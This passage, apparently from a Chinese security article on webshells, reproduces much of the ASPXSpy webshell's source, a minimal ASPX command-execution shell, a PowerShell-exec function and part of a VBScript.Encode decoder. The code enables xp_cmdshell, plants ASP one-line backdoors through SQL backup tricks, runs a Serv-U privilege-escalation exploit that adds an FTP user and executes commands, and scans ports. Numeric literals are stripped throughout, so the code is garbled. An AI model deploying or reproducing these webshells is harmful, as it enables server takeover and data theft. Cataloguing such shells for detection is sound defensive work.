public void Item_Command(object sender, DataGridCommandEventArgs e)
{
if (e.CommandName == "Cancel")
{
Bin_DataGrid.EditItemIndex = -;
Bin_Databind();
}
} protected void Bin_ExecButton_Click(object sender, EventArgs e)
{
try
{ Bin_Scroll.Visible = true;
Bin_DataGrid.Visible = true;
Bin_DataGrid.AllowPaging = true;
Bin_Accbind();
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
}
string sqlstr = Bin_DBstrTextBox.Text;
sqlstr = sqlstr.TrimStart().ToLower();
if (sqlstr.Substring(, ) == "select")
{
DataTable databind = Bin_DataTable(sqlstr);
Bin_DataGrid.DataSource = databind;
Bin_DataGrid.DataBind();
}
else
{
Bin_ExecSql(sqlstr);
Bin_Databind();
}
}
catch(Exception error)
{
Bin_Error(error.Message);
}
} protected void Bin_BDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_Accbind();
Bin_DBmenuPanel.Visible = true;
Bin_DataGrid.Visible = false;
Bin_DataGrid.AllowPaging = true;
Bin_Scroll.Visible = false;
Bin_DBstrTextBox.Text = "";
Bin_SAexecButton.Visible = false;
Bin_ResLabel.Visible = false;
Bin_dirPanel.Visible = false; } protected void Bin_SACMDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_SAexecButton.Visible = true;
Bin_Change();
Bin_ExecButton.Visible = false;
Bin_ResLabel.Visible = false;
Session["Bin_Option"] = null;
Bin_dirPanel.Visible = false; }
public void Bin_Change()
{
Bin_ExecButton.Visible = false;
string select = "<input type=hidden name=goaction><input type=hidden name=todo><input type=hidden name=intext><select onchange=if(this.value!='')Command('changedata',this);><option>SQL Server Exec<option value=\"Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')\">Add sp_oacreate<option value=\"Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')\">Add xp_cmdshell<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">Add xp_cmdshell<option value=\"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;\">Add xp_cmdshell(SQL2005)<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">XP_cmdshell exec<option value=\"Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^> > c:\\1.asp';\">SP_oamethod exec<option value=\"sp_makewebtask @outputfile='d:\\web\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))" + "%" + ">''' \">SP_makewebtask make file";
if (Session["Bin_Option"] != null)
{
select += "<option SELECTED>" + Session["Bin_Option"] + "</option>";
}
select += "</select>";
Bin_AccinfoLabel.Text = select;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
} protected void Bin_SAexecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Change();
Bin_DBinfoLabel.Visible = false;
Bin_ExecButton.Visible = false;
Bin_Scroll.Visible = false;
Bin_DataGrid.Visible = false;
Bin_DBmenuPanel.Visible = true;
string sqlstr = Bin_DBstrTextBox.Text;
DataTable databind = Bin_DataTable(sqlstr);
string res = "";
foreach (DataRow dr in databind.Rows)
{
for (int i = ; i < databind.Columns.Count; i++)
{
res += dr[i] + "\r";
}
}
Bin_ResLabel.Text = "<hr><div id=\"nei\"><PRE>" + res.Replace(" ", "&nbsp;").Replace("<", "&lt;").Replace(">", "&gt;") + "</PRE></div>"; }
catch (Exception error)
{
Bin_Error(error.Message);
} } protected void Bin_DirButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_DBinfoLabel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
} protected void Bin_listButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_DBinfoLabel.Visible = false;
Bin_SqlDir();
}
public void Bin_SqlDir()
{
try
{
Bin_DataGrid.Visible = true;
Bin_Scroll.Visible = true;
Bin_DataGrid.AllowPaging = false;
string exesql = "use pubs;if exists (select * from sysobjects where id = object_id(N'[bin_dir]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) INSERT bin_dir EXEC MASTER..XP_dirtree '" + Bin_DirTextBox.Text + "',1,1;";
Bin_ExecSql(exesql);
DataTable sql_dir = Bin_DataTable("select * from bin_dir");
Bin_DataGrid.DataSource = sql_dir;
Bin_DataGrid.DataBind();
}
catch (Exception e)
{
Bin_Error(e.Message);
}
}
protected void Bin_SuButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = true;
Bin_IISPanel.Visible = false;
Bin_SuresLabel.Text = "";
Bin_LoginPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
}
protected void Bin_dbshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_BakDB();
}
public void Bin_BakDB()
{
string path = Bin_DirTextBox.Text.Trim();
if (path.Substring(path.Length - , ) == @"\")
{
path = path + "bin.asp";
}
else
{
path = path + @"\bin.asp";
}
string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup database @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup database @b to disk = @t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
public void Bin_BakLog()
{
string path = Bin_DirTextBox.Text.Trim();
if (path.Substring(path.Length - , ) == @"\")
{
path = path + "bin.asp";
}
else
{
path = path + @"\bin.asp";
}
string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup log @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
protected void Bin_LogshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_BakLog();
}
protected void Bin_SuexpButton_Click(object sender, EventArgs e)
{
string Result = "";
string user = Bin_SunameTextBox.Text;
string pass = Bin_SupassTextBox.Text;
int port = Int32.Parse(Bin_SuportTextBox.Text);
string cmd = Bin_SucmdTextBox.Text;
string loginuser = "user " + user + "\r\n";
string loginpass = "pass " + pass + "\r\n";
string site = "SITE MAINTENANCE\r\n";
string deldomain = "-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
string setdomain = "-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
string newdomain = "-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
string quite = "QUIT\r\n";
try
{
TcpClient tcp = new TcpClient("127.0.0.1", port);
tcp.ReceiveBufferSize = ;
NetworkStream NS = tcp.GetStream();
Result = Rev(NS);
Result += Send(NS, loginuser);
Result += Rev(NS);
Result += Send(NS, loginpass);
Result += Rev(NS);
Result += Send(NS, site);
Result += Rev(NS);
Result += Send(NS, deldomain);
Result += Rev(NS);
Result += Send(NS, setdomain);
Result += Rev(NS);
Result += Send(NS, newdomain);
Result += Rev(NS);
TcpClient tcp1 = new TcpClient("127.0.0.1", );
NetworkStream NS1 = tcp1.GetStream();
Result += Rev(NS1);
Result += Send(NS1, "user bin\r\n");
Result += Rev(NS1);
Result += Send(NS1, "pass binftp\r\n");
Result += Rev(NS1);
Result += Send(NS1, "site exec " + cmd + "\r\n");
Result += Rev(NS1);
tcp1.Close();
Result += Send(NS, deldomain);
Result += Rev(NS);
Result += Send(NS, quite);
Result += Rev(NS);
tcp.Close();
}
catch (Exception error)
{
Bin_Error(error.Message);
}
Bin_SuresLabel.Text = "<div id=\"su\"><pre>" + Result + "</pre></div>";
}
protected string Rev(NetworkStream instream)
{
string Restr = "";
if (instream.CanRead)
{
byte[] buffer = new byte[];
instream.Read(buffer, , buffer.Length);
Restr = Encoding.ASCII.GetString(buffer);
}
return "<font color = red>" + Restr + "</font><br>";
}
protected string Send(NetworkStream instream,string Sendstr)
{
if (instream.CanWrite)
{
byte[] buffer = Encoding.ASCII.GetBytes(Sendstr);
instream.Write(buffer, , buffer.Length);
}
return "<font color = blue>" + Sendstr + "</font><br>";
}
protected void Bin_IISButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible = false;
Bin_MainPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = true;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_iisLabel.Text = Bin_iisinfo();
}
protected void Bin_PortButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = true;
Bin_ScanresLabel.Text = "";
}
protected void Bin_RegButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = true;
Bin_PortPanel.Visible = false;
Bin_RegresLabel.Text = "";
}
protected void Bin_RegreadButton_Click(object sender, EventArgs e)
{
try
{
string regkey = Bin_KeyTextBox.Text;
string subkey = regkey.Substring(regkey.IndexOf("\\") + , regkey.Length - regkey.IndexOf("\\") - );
RegistryKey rk = null;
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_LOCAL_MACHINE")
{
rk = Registry.LocalMachine.OpenSubKey(subkey);
}
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_CLASSES_ROOT")
{
rk = Registry.ClassesRoot.OpenSubKey(subkey);
}
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_CURRENT_USER")
{
rk = Registry.CurrentUser.OpenSubKey(subkey);
}
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_USERS")
{
rk = Registry.Users.OpenSubKey(subkey);
}
if (regkey.Substring(, regkey.IndexOf("\\")) == "HKEY_CURRENT_CONFIG")
{
rk = Registry.CurrentConfig.OpenSubKey(subkey);
}
Bin_RegresLabel.Text = "<br>Result : " + rk.GetValue(Bin_ValueTextBox.Text, "NULL").ToString();
}
catch (Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_ScancmdButton_Click(object sender, EventArgs e)
{
try
{
string res = "";
string[] port = Bin_PortsTextBox.Text.Split(',');
for (int i = ; i < port.Length; i++)
{
res += Bin_Scan(Bin_ScanipTextBox.Text, Int32.Parse(port[i])) + "<br>";
}
Bin_ScanresLabel.Text = "<hr>" + res;
}
catch (Exception error)
{
Bin_Error(error.Message);
}
}
protected string Bin_Scan(string ip, int port)
{
string scanres = "";
TcpClient tcp = new TcpClient();
tcp.SendTimeout = tcp.ReceiveTimeout = ;
try
{
tcp.Connect(ip, port);
tcp.Close();
scanres = ip + " : " + port + " ................................. <font color=green><b>Open</b></font>";
}
catch (SocketException e)
{
scanres = ip + " : " + port + " ................................. <font color=red><b>Close</b></font>";
}
return scanres;
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>ASPXSpy1. -> Bin:)</title>
<style type="text/css">
A:link {
COLOR:#; TEXT-DECORATION:None
}
A:visited {
COLOR:#; TEXT-DECORATION:None
}
A:active {
COLOR:#; TEXT-DECORATION:None
}
A:hover {
COLOR:#; TEXT-DECORATION:underline
}
BODY {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
}
#nei {
width:500px;
margin:0px auto; overflow:hidden
}
#su {
width:300px;
margin:0px auto; overflow:hidden
}
#cmd {
width:500px;
margin:0px auto; overflow:hidden
}
</style>
<script type="text/javascript" language="javascript" >
function Command(cmd, str)
{
var strTmp = str;
var frm = document.forms[];
if(cmd == 'del')
{
if(confirm('Del It ?'))
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
else return;
}
if (cmd == 'change')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'down')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'showatt')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'edit')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'deldir')
{
if(confirm('Del It ?'))
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
else return;
}
if(cmd == 'rename' )
{
frm.goaction.value = cmd;
frm.todo.value = str + ',';
str = prompt('Please input new filename:', strTmp);
if(str && (strTmp != str))
{
frm.todo.value += str;
frm.submit();
}
else return;
}
if(cmd == 'renamedir' )
{
frm.goaction.value = cmd;
frm.todo.value = str + ',';
str = prompt('Please input new foldername:', strTmp);
if(str && (strTmp != str))
{
frm.todo.value += str;
frm.submit();
}
else return;
}
if (cmd == 'postdata')
{
frm.todo.value = str.value;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'changedata')
{
frm.todo.value = str.value;
frm.intext.value = str.options[str.selectedIndex].innerText
frm.goaction.value = cmd;
frm.submit();
}
}
</script>
</head>
<body>
<form id="form1" runat="server"><div style="text-align: center"><asp:Panel ID="Bin_LoginPanel" runat="server" Height="47px" Width="401px">
<asp:Label ID="PassLabel" runat="server" Text="Password:"></asp:Label>
<asp:TextBox ID="passtext" runat="server" TextMode="Password" Width="203px"></asp:TextBox>
<asp:Button ID="LoginButton" runat="server" Text="Enter" OnClick="LoginButton_Click" /><p />
Copyright (C) Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a></asp:Panel><asp:Panel ID="Bin_MenuPanel" runat="server" Height="56px" Width="771px">
<asp:Label ID="TimeLabel" runat="server" Text="Label" Width="150px"></asp:Label><br />
<asp:Button ID="MainButton" runat="server" OnClick="MainButton_Click" Text="Sysinfo" />
<asp:Button ID="Bin_IISButton" runat="server" OnClick="Bin_IISButton_Click" Text="IISSpy" />
<asp:Button ID="FileButton" runat="server" OnClick="FileButton_Click" Text="WebShell" />
<asp:Button ID="Bin_CmdButton" runat="server" Text="Command" OnClick="Bin_CmdButton_Click" />
<asp:Button ID="Bin_SQLButton" runat="server" OnClick="Bin_SQLButton_Click" Text="SqlTools" />&nbsp;<asp:Button
ID="Bin_SuButton" runat="server" OnClick="Bin_SuButton_Click" Text="SuExp" />
<asp:Button ID="Bin_PortButton" runat="server" Text="PortScan" OnClick="Bin_PortButton_Click" />
<asp:Button ID="Bin_RegButton" runat="server" Text="RegShell" OnClick="Bin_RegButton_Click" />
<asp:Button ID="LogoutButton" runat="server" OnClick="LogoutButton_Click" Text="Logout" /><br />
<asp:Label ID="Bin_ErrorLabel" runat="server" EnableViewState="False">Copyright (C) Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a> -> <a href="http://www.rootkit.net.cn/index.aspx" target="_blank">Reverse-IP</a> </asp:Label></asp:Panel>
<asp:Panel ID="Bin_MainPanel" runat="server" Width="769px" EnableViewState="False" Visible="False" Height="20px">
<div style="text-align: left"><asp:Label ID="InfoLabel" runat="server" Width="765px" EnableViewState="False" ></asp:Label></div></asp:Panel><div style="text-align: center">
<asp:Panel ID="Bin_FilePanel" runat="server" Width="767px" EnableViewState="False" Visible="False"><div style="text-align: left"><asp:Label ID="Bin_FileLabel" runat="server" Text="Label" Width="764px"></asp:Label><br />
<asp:Label ID="Bin_UpfileLabel" runat="server" Text="Upfile : "></asp:Label>
<input class="TextBox" id="Bin_UpFile" type="file" name="upfile" runat="server" />&nbsp;<asp:TextBox ID="Bin_upTextBox" runat="server" Width="339px"></asp:TextBox>&nbsp;
<asp:Button ID="Bin_GoButton" runat="server" OnClick="Bin_GoButton_Click" Text="GO" />
<asp:Button ID="Bin_upButton" runat="server" Text="UpLoad" OnClick="Bin_upButton_Click" EnableViewState="False" /><br />
<asp:Label ID="Bin_CreateLabel" runat="server" Text="Create :"></asp:Label>
<asp:TextBox ID="Bin_CreateTextBox" runat="server"></asp:TextBox><asp:Button ID="Bin_NewFileButton"
runat="server" Text="NewFile" OnClick="Bin_NewFileButton_Click" />
<asp:Button ID="Bin_NewdirButton" runat="server" Text="NewDir" OnClick="Bin_NewdirButton_Click" />
<br />
<asp:Label ID="Bin_CopyLabel" runat="server" Text="Copy :" Width="39px"></asp:Label>
&nbsp;
<asp:TextBox ID="Bin_CopyTextBox" runat="server" Width="273px"></asp:TextBox>
<asp:Label ID="Bin_CopytoLable" runat="server" Text="To:"></asp:Label>
<asp:TextBox ID="Bin_CopytoTextBox" runat="server" Width="268px"></asp:TextBox>
<asp:Button ID="Bin_CopyButton" runat="server" Text="Copy" OnClick="Bin_CopyButton_Click" />
<asp:Button ID="Bin_CutButton" runat="server" Text="Cut" Width="46px" OnClick="Bin_CutButton_Click" />
<asp:Label ID="Bin_FilelistLabel" runat="server" EnableViewState="False"></asp:Label></div><div style="text-align: center">
<asp:Panel ID="Bin_AttPanel" runat="server" Width="765px" Visible="False"><hr />
FileName :
<asp:Label ID="Bin_AttLabel" runat="server" Text="Label"></asp:Label><br />
<asp:CheckBox ID="Bin_ReadOnlyCheckBox" runat="server" Text="ReadOnly" />
<asp:CheckBox ID="Bin_SystemCheckBox" runat="server" Text="System" />
<asp:CheckBox ID="Bin_HiddenCheckBox" runat="server" Text="Hidden" />
<asp:CheckBox ID="Bin_ArchiveCheckBox" runat="server" Text="Archive" />
<br />
CreationTime :
<asp:TextBox ID="Bin_CreationTimeTextBox" runat="server" Width="123px"></asp:TextBox>
LastWriteTime :
<asp:TextBox ID="Bin_LastWriteTimeTextBox" runat="server" Width="129px"></asp:TextBox>
LastAccessTime :
<asp:TextBox ID="Bin_AccessTimeTextBox" runat="server" Width="119px"></asp:TextBox><br />
<asp:Button ID="Bin_SetButton" runat="server" OnClick="Bin_SetButton_Click" Text="Set" />
<asp:Button ID="Bin_SbackButton" runat="server" OnClick="Bin_SbackButton_Click" Text="Back" />
<hr />
</asp:Panel></div>
<div style="text-align: center"><asp:Panel ID="Bin_EditPanel" runat="server" Visible="False"><hr style="width: 757px" />
Path:<asp:TextBox ID="Bin_EditpathTextBox" runat="server" Width="455px"></asp:TextBox><br />
<asp:TextBox ID="Bin_EditTextBox" runat="server" TextMode="MultiLine" Columns="" Rows="" Width="760px"></asp:TextBox><br />
<asp:Button ID="Bin_EditButton" runat="server" Text="Sumbit" OnClick="Bin_EditButton_Click" />&nbsp;<asp:Button
ID="Bin_BackButton" runat="server" OnClick="Bin_BackButton_Click" Text="Back" /></asp:Panel></div></asp:Panel></div>
<asp:Panel ID="Bin_CmdPanel" runat="server" Height="50px" Width="763px"><hr />
CmdPath : &nbsp;<asp:TextBox ID="Bin_CmdPathTextBox" runat="server" Width="395px">C:\Windows\System32\Cmd.exe</asp:TextBox><br />
Argument :
<asp:TextBox ID="Bin_CmdShellTextBox" runat="server" Width="395px">/c Set</asp:TextBox><br />
<asp:Button ID="Bin_RunButton" runat="server" OnClick="Bin_RunButton_Click" Text="Run" />
<div style="text-align: left">
<asp:Label ID="Bin_CmdLabel" runat="server" EnableViewState="False"></asp:Label></div>
<hr /></asp:Panel>
<asp:Panel ID="Bin_SQLPanel" runat="server" Visible="False" Width="763px">
<hr />
ConnString :
<asp:TextBox ID="Bin_SQLconnTextBox" runat="server" Width="547px">server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB</asp:TextBox><br />
<asp:RadioButton ID="Bin_SQLRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_SQLRadioButton_CheckedChanged" Text="MS-SQL" Checked="True" />
<asp:RadioButton ID="Bin_AccRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_AccRadioButton_CheckedChanged" Text="MS-Access" />
<asp:Button ID="SQL_SumbitButton" runat="server" Text="Sumbit" OnClick="SQL_SumbitButton_Click" /><hr />
<asp:Panel ID="Bin_DBmenuPanel" runat="server" Width="759px" Visible="False">
<asp:Button ID="Bin_BDButton" runat="server" Text="DataBase" OnClick="Bin_BDButton_Click" />
<asp:Button ID="Bin_SACMDButton" runat="server" Text="SA_Exec" OnClick="Bin_SACMDButton_Click" />
<asp:Button ID="Bin_DirButton" runat="server" Text="SQL_Dir" OnClick="Bin_DirButton_Click" /><br /><hr /><div style="text-align: left">
<asp:Label ID="Bin_DBinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label></div></asp:Panel>
<asp:Panel ID="Bin_AccPanel" runat="server" Height="50px" Width="759px" EnableViewState="False">
<asp:Label ID="Bin_AccinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label><br />
<asp:TextBox ID="Bin_DBstrTextBox" runat="server" TextMode="MultiLine" Width="569px"></asp:TextBox>
<asp:Button ID="Bin_ExecButton" runat="server" OnClick="Bin_ExecButton_Click" Text="Exec" />
<asp:Button ID="Bin_SAexecButton" runat="server" Text="SA_Exec" OnClick="Bin_SAexecButton_Click" /><br />
<div style="text-align:left">
<asp:Label ID="Bin_ResLabel" runat="server" ></asp:Label></div></asp:Panel>
<asp:Panel ID="Bin_dirPanel" runat="server" Visible="False" Width="759px">
Path :
<asp:TextBox ID="Bin_DirTextBox" runat="server" Width="447px">c:\</asp:TextBox>
<br />
<asp:Button ID="Bin_listButton" runat="server" OnClick="Bin_listButton_Click" Text="Dir" />&nbsp;<asp:Button
ID="Bin_dbshellButton" runat="server" OnClick="Bin_dbshellButton_Click" Text="Bak_DB" />
<asp:Button ID="Bin_LogshellButton" runat="server" Text="Bak_LOG" OnClick="Bin_LogshellButton_Click" /><hr /></asp:Panel>
<br /><br />
<div style="overflow:scroll; text-align:left; width:770px;" id="Bin_Scroll" runat="server" visible="false" >
<asp:DataGrid ID="Bin_DataGrid" runat="server" Width="753px" PageSize="" CssClass="Bin_DataGrid" OnItemDataBound="Item_DataBound" AllowPaging="True" OnPageIndexChanged="Bin_DBPage" OnItemCommand="Item_Command">
<PagerStyle Mode="NumericPages" Position="TopAndBottom" />
</asp:DataGrid></div>
</asp:Panel>
<asp:Panel ID="Bin_SuPanel" runat="server" Width="763px" >
<hr />
Name :
<asp:TextBox ID="Bin_SunameTextBox" runat="server">localadministrator</asp:TextBox>
Pass :
<asp:TextBox ID="Bin_SupassTextBox" runat="server">#l@$ak#.lk;@P</asp:TextBox>
Port :
<asp:TextBox ID="Bin_SuportTextBox" runat="server"></asp:TextBox><br />
CMD :
<asp:TextBox ID="Bin_SucmdTextBox" runat="server" Width="447px">cmd.exe /c net user</asp:TextBox><br />
<asp:Button ID="Bin_SuexpButton" runat="server" Text="Exploit" OnClick="Bin_SuexpButton_Click" /><br />
<div style="text-align:left">
<hr />
<asp:Label ID="Bin_SuresLabel" runat="server"></asp:Label>
</div>
</asp:Panel>
<asp:Panel ID="Bin_IISPanel" runat="server" Width="763px"><div style="text-align:left">
<hr />
<asp:Label ID="Bin_iisLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label>&nbsp;</div></asp:Panel>
<asp:Panel ID="Bin_RegPanel" runat="server" Width="763px"><hr /><div style="text-align:left">
KEY :&nbsp; &nbsp;<asp:TextBox ID="Bin_KeyTextBox" runat="server" Width="595px">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br />
VALUE :
<asp:TextBox ID="Bin_ValueTextBox" runat="server" Width="312px">ComputerName</asp:TextBox>&nbsp;<asp:Button
ID="Bin_RegreadButton" runat="server" Text="Read" OnClick="Bin_RegreadButton_Click" /><br />
<asp:Label ID="Bin_RegresLabel" runat="server"></asp:Label><hr /></div></asp:Panel>
<asp:Panel ID="Bin_PortPanel" runat="server" Width="763px">
<hr /><div style="text-align:left">
IP :
<asp:TextBox ID="Bin_ScanipTextBox" runat="server" Width="194px">127.0.0.1</asp:TextBox>
PORT :
<asp:TextBox ID="Bin_PortsTextBox" runat="server" Width="356px">,,,,,,,,</asp:TextBox>
<asp:Button ID="Bin_ScancmdButton" runat="server" Text="Scan" OnClick="Bin_ScancmdButton_Click" /><br />
<asp:Label ID="Bin_ScanresLabel" runat="server"></asp:Label></div><hr /></asp:Panel> </div></form>
</body>
</html>

0x2: CMS WEBSHELL

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
string item = cmd.Text;
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
string strOutput = null;
p.Start();
p.StandardInput.WriteLine(item);
p.StandardInput.WriteLine("exit");
strOutput = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>");
Response.Write(strOutput);
Response.Write("</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
}
</script>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:" /><asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>

Relevant Link:

http://www.jb51.net/article/26387.htm
http://blog.csdn.net/zaiyong/article/details/25873399
https://raw.githubusercontent.com/tennc/webshell/master/net-friend/aspx/aspxspy.aspx
http://www.jb51.net/article/39983.htm
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
https://github.com/tennc/webshell/blob/master/aspx/icesword.aspx

0x3: PowerShell Webshell

string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "powershell.exe";
psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}

Relevant Link:

https://www.microsoft.com/taiwan/technet/columns/profwin/28-monad.mspx
https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx

5. Common encoding and conversion techniques used to hide webshells

0x1: VBScript.encode

Public Function DCScript(ByVal Script As String) As String
Dim s As String, l As Long
Dim b As Long, e As Long
Dim k As Long
l = LenB(Script): s = Space(l) '...
b = InStr(Script, "#@~^") '#@~^******==
e = InStr(Script, "^#~@") '******==^#~@
If b = Or e = Then
If MsgBox("没找到密文开始/结束标识,解密结果可能有误!要继续吗?", vbYesNo) = vbNo Then
Exit Function
Else
If e = Then e = l Else e = e -
If b = Then b = Else b = b +
End If
Else
b = b + 'if 0, decode everything
e = e - 'if 0, run to the end
End If
frmMain.Caption = "Decoding ..."
Script = Mid(Script, b, e - b + )
'Script = Replace(Script, "@#", Chr(13))
'Script = Replace(Script, "@&", Chr(10))
Script = Replace(Script, "@#@&", Chr() + Chr()) 'vbcCrlf
Script = Replace(Script, "@!", "<")
Script = Replace(Script, "@*", ">")
Script = Replace(Script, "@$", "@") 'generate @ last
'k = YXScrDecode(Script, s, Len(Script))
k = YXScrDecoder(Script, s)
's = Replace(s, Chr(13) + Chr(2), vbCrLf)'this turned out to be caused by 0x10 and 0x0A
'which raises another question: why is element -1 of the char array 0x02
frmMain.Caption = "碰到我算你倒霉!"
DCScript = Left(s, k)
End Function

Perl code

#!/usr/bin/perl -w -- 

# VBScript/JScript.Encode Decoder 

# Based on Full-Disclosure message "VBScript/JScript.Encode Decoder"
